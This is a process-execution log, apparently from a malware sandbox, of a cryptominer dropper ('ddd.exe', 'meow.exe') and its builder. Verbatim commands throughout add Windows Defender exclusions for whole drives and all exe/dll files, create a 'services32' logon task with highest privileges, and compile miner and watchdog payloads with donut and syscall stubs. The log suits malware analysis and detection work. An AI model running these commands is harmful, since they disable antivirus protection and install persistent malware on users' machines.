C:\Users\Admin\Downloads\ddd.exe

"C:\Users\Admin\Downloads\ddd.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\ddd.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\ddd.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services32.exe"

C:\Windows\system32\services32.exe

C:\Windows\system32\services32.exe

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff537bdcf8,0x7fff537bdd04,0x7fff537bdd10

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1892,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1888 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1452,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2228 /prefetch:11

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2332,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2348 /prefetch:13

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3340,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3440 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4172,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4200 /prefetch:9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4664 /prefetch:1

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost32"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5280,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5288 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5420,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5548 /prefetch:14

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\Downloads\ddd.exe

"C:\Users\Admin\Downloads\ddd.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4332,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5684 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5556 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5600,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5308 /prefetch:14

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\ddd.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c taskkill /f /PID "3420"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\taskkill.exe

taskkill /f /PID "3420"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services32.exe"

C:\Windows\system32\services32.exe

C:\Windows\system32\services32.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost32"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=872,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4164 /prefetch:10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i3rfnhoy\i3rfnhoy.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES246B.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCC39E29CBB8847B3B9286CDF945D92C.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow-watchdog.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "meow-watchdog-loader.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ikh2nv1u\ikh2nv1u.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CA8.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCC71639714D234F549EB78366C3E05579.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrh2qk5c\xrh2qk5c.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES31D8.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCDB63BCADB25A4E3395978E2E364A2DFD.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow-uninstaller-payload.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "meow-uninstaller.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow-miner.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "meow.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd.exe"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c taskkill /f /PID "5912"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\taskkill.exe

taskkill /f /PID "5912"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services32.exe"

C:\Windows\system32\services32.exe

C:\Windows\system32\services32.exe

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost32"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=2472,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5428 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5784,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4292 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3560,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3472 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3428,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5896 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

